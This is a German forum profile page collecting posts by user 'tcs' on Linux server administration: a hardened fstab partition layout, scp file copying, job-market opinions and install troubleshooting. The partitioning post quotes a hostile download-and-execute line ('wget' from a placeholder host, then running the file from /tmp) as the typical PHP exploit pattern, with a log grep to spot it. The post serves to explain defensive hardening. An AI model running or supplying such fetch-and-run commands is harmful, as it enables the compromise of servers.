Beiträge von tcs

  • Frage zur richtigen Partionierung der Server-Festplatte

    ehrm...
    Bei der Partitionierung möchte ich vehement widersprechen. Ich wünsche meinem schlimmsten Feind nicht daß seine rootpartition mit Logspam eines durchgeknallten Servertasks voll läuft. Genau das ermöglicht aber der 08/15 Standardtip "hau alles in eine Partition"...


    IMHO gehört wenigstens /var auf eine eigene Partition. Wenn man dann noch etwas Wert auf Systemsicherheit legt geht auch kein Weg an einer extra Partition für /tmp vorbei, gemountet mit Option noexec mindestens.


    Folgendes hat sich bisher bewährt:

    Code
    # <file system> <mount point>   <type>      <options>                                 <dump>  <pass>
/dev/hda1       /boot           ext2        noauto,noatime                            1       1
/dev/hda2       /none           swap        sw                                        0       0
/dev/hda3       /               reiserfs    notail,noatime                            0       0
/dev/hda5       /usr            reiserfs    notail,noatime,nodev,ro                   0       0
/dev/hda6       /home           reiserfs    notail,noatime,nosuid                     0       0
/dev/hda7       /tmp            reiserfs    notail,noatime,nodev,nosuid,noexec        0       0
/dev/hda8       /var            reiserfs    notail,noatime,nodev                      0       0
proc            /proc           proc        defaults                                  0       0


    Erklärungen im einzelnen:


    /boot beinhaltet Kernel und dergleichen, ich brauche diese Partition nur wenn ich etwas ändere, deswegen muß sie eigentlich nie gemountet sein. Journal brauche ich noch weniger, deswegen ext2.


    swap dürfte klar sein :wink:


    rootpartition ist nur mit notail,noatime gemountet, dies dient ausschließlich der Performance.


    /usr ist auf meinen Servern ro gemountet, unbedingt aufpassen wenn man Updates einspielt und dergleichen! Die Partition muß vorher rw remountet werden!


    /home könnte man zusätzlich noch mit der Option nodev einbinden, ist in meinem Fall leider nicht möglich da ich einige chroot() jails auf dieser Partition habe. Könnte man natürlich noch auf eine eigene Partition auslagern.


    /tmp ist äußerst restriktiv gemountet, fast alle php exploits die man im Netz so beobachten kann laufen nach demselben Schema ab:
    * Site suchen die phpbb oder noch besser phpnuke am laufen haben
    * per google einen exploit für die verwendete Version suchen
    * Haarsträubende Adreßzeile im Browser pasten
    Diese bewirkt im allgemeinen folgendes:
    Da die meisten php scripts schändlich schlampig und unsicher "programmiert" sind ist es ein leichtes einen Shellbefehl á la

    Code
    wget http://1337.bla/destructiveblah && /tmp/destructiveblah


    auszuführen.
    Teil eins geht noch gut, Teil zwei wird durch die Option noexec verhindert. So laufen mindestens 90% dieser Asseln in's leere.
    Wer's nicht glaubt:

    Code
    grep -iR wget /var/log/apache* >> ~/fuckyoukiddies


    Zuletzt noch /var, hier wären sicherlich auch noch weitere Optionen möglich, mir reicht in diesem Fall ein einfaches nodev.
    Als Filesystem verwende ich eigentlich immer reiserfs (nicht 4), ist schnell und stabil.


    So, hoffe etwas Klarheit geschaffen und die eine oder andere weitere Überlegung eingebracht zu haben.


    Cheers


    tcs

  • innertrace vserver erfahrung/meinung

    Der von oezgueng gepostete Link sollte inhaltlich nicht ernst genommen werden da das Forum auf besagter Website schlimmer als heise in besten Zeiten ist. Es handelt sich hier um einen peinlichen Kindergarten von Pseudo-Providern die nichts besseres zu tun haben als fleißig mit Dreck um sich zu werfen.


    Repräsentativ in solchen Fällen ist nur, sich Kunden von dem betreffenden Provider rauszusuchen und diese zu befragen.


    Cheers


    tcs

  • Moinsen Leute

    Willkommen an Bo(a)rd ^^


    Hoffentlich können wir gut helfen, und wir freuen uns natürlich wenn Du auch helfen hilfst :wink:


    Cheers


    tcs

  • Von Root zu Root kopieren

    Code
    scp user@192.168.0.1:/home/gameserver/cod2.tar.gz ./


    Dieser Befehl kopiert die Datei /home/gameserver/cod2.tar.gz vom Server mit der IP 192.168.0.1 in das Verzeichnis von dem aus der Befehl ausgeführt wird.


    Umgekehrt:

    Code
    scp cod2.tar.gz user@192.168.0.1:/home/gameserver/


    Wichtig bei beiden Befehlen ist folgendes:
    Befehl 1
    * user muß auf dem Server 192.168.0.1 die Datei lesen dürfen und im aktuellen lokalen Verzeichnis schreiben dürfen.


    Befehl 2
    * user muß lokal die zu kopierende Datei lesen dürfen und im Verzeichnis /home/gameserver auf dem Server 192.168.0.1 schreiben dürfen.


    Bitte die exakten Befehle hier posten wenn es noch nicht funktionieren sollte.


    Cheers


    tcs

  • Mit was kann man nebenberuflich Geld verdienen?

    bobby:


    ich würde sogar noch einen Schritt weiter gehen und behaupten daß man mit Linux alleine völlig auf dem Schlauch steht. Ohne belegbare Windowskenntnisse im Serverbereich wird's da eher schlecht aussehen. Gamehoster und/oder andere Hostingfirmen die Linux nutzen fallen auch flach als Arbeitgeber weil's sich hier meistens um eine 3-Nasen "Firma" handelt die zur richtigen Zeit am richtigen Ort waren und deshalb bisher überleben konnten. Anstellen werden die sicher niemanden weil man ohne weiteres eben "nebenher" ein paar Server administrieren kann.


    In der Fragestellung wurde das ja auch wunderbar dargestellt, "nebenher" mit der Administration von einem oder mehrerer Server Geld verdienen. Genauso läuft's in der Welt. Nix mit fester Anstellung, da geht nur was mit Partnerauftrag oder ähnlichen Verar*****gen (kaum Kohle aber 24/7 Verfügbarkeit sonst macht's jemand anders).


    Meine Empfehlung:
    Die dicken Fische anschauen, Windowsserver und -netzwerke büffeln. Da ist was zu verdienen. IBM ist auch kein Schaden, Websfear z.B. :wink:


    Cheers


    tcs

  • Homeserver Linux 10 Install

    @Threadstarter:


    Ganz richtig heißt es tatsächlich SuSE 10, Linux ist erst bei Version 2.6.14.3 :wink:
    Der Begriff Linux bezieht sich nämlich ausschließlich auf den verwendeten Kernel.


    Der Tip von Alex hätte mir so in der Richtung auch vorgeschwebt, unter Umständen hilft es schon die Auflösung anzupassen. Das Problem dürfte in der Hardwareerkennung zu suchen sein, da Du vom Monitor die Meldung "No Signal" bekommst tippe ich auf einen Fehler mit der Grafikkarte, dem Monitor und/oder einer Mischung von beidem mit einer unverträglichen Auflösung/Bildwiederholrate. Notfalls gibt es natürlich immer die Möglichkeit einer textbasierten Installation, die sollte eigentlich immer funktionieren.


    oezgueng:


    Wenn Du nichts anderes dazu beizutragen hast laß es bitte gleich sein. In diesem Falle schweift Dein Beitrag nicht nur vom Thema ab sondern hat mit einer Lösung oder dergleichen weniger als nichts zu tun.


    Cheers


    tcs

  • Root Server Backup

    Zitat von oezgueng

    ne, ich kann kein linux, ich kann kein pc, ich kann kein telefon bedienen :D


    Ich glaub ich hab ne neue Signatur gefunden... *scnr*


    Cheers


    tcs

  • der irc bot ist blöd ...

    Zitat von blueyonder.uk.quakenet.org


    [23:01:57] This server supports: WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=20 MAXBANS=45 NICKLEN=15 MAXNICKLEN=15 :are supported by this server


    Manchmal hilft es ungemein sich die Fähigkeiten/angebotenen Features eines Servers den man nutzt anzuschauen... :wink:


    Cheers


    tcs